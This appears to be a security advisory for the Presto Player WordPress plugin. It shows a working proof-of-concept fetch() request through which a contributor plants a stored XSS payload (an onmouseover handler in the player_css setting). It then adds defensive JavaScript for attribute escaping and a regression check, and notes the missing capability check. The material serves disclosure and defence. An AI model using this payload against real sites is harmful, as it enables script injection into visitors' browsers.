As a contributor, get a REST nonce by opening (while logged in)

Then run the command below in the developer console of the web browser (while still logged in as a contributor, and with <NONCE> replaced by the nonce retrieved above):

fetch("/wp-json/presto-player/v1/settings", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded"
  },
  "method": "POST",
  "body": 'presto_player_branding[player_css]=123"onmouseover=alert(/XSS/)//&_wpnonce=<NONCE>',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

The XSS will be triggered on every page where the Audio player is embedded, when the mouse is moved over it.
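
Why the player_css value in the request above ends up as an event handler, and an output-side regression check that catches it, as an added example (not code from the plugin or from this advisory). The `div`/`style` markup and the render functions are assumptions standing in for wherever the plugin prints the setting, and the tokenizer covers only the subset of HTML start-tag parsing needed here.

```javascript
// Added example: tag name, attribute name and render functions are
// hypothetical; only the setting value is taken from the request above.
const SETTING = '123"onmouseover=alert(/XSS/)//';

// Encode a value for use inside a double-quoted HTML attribute.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Vulnerable pattern: stored value concatenated into the attribute as-is.
const renderRaw = (css) => `<div style="${css}">`;
// Hardened pattern: value encoded for the attribute context on output.
const renderEscaped = (css) => `<div style="${escapeAttr(css)}">`;

// Minimal start-tag attribute tokenizer (subset of the HTML parsing rules):
// a name may begin directly after a closing quote, which is what the
// stored value relies on. Returns the attribute names in order.
function attributeNames(tag) {
  const names = [];
  let i = tag.search(/[\s/>]/); // skip past "<div"
  while (i < tag.length) {
    while (i < tag.length && /[\s/]/.test(tag[i])) i++;
    if (i >= tag.length || tag[i] === ">") break;
    const start = i;
    while (i < tag.length && !/[\s/>=]/.test(tag[i])) i++;
    names.push(tag.slice(start, i).toLowerCase());
    while (i < tag.length && /\s/.test(tag[i])) i++;
    if (tag[i] !== "=") continue; // attribute without a value
    i++;
    while (i < tag.length && /\s/.test(tag[i])) i++;
    if (tag[i] === '"' || tag[i] === "'") {
      const close = tag.indexOf(tag[i], i + 1);
      i = close === -1 ? tag.length : close + 1;
    } else {
      while (i < tag.length && !/[\s>]/.test(tag[i])) i++; // unquoted value
    }
  }
  return names;
}

// Regression check: true when rendering adds an event-handler attribute.
function introducesHandler(render, value) {
  return attributeNames(render(value)).some((n) => n.startsWith("on"));
}
```

Escaping on output is only half of the fix: the request above also succeeds for a contributor, so the settings route needs a capability check that this role does not pass.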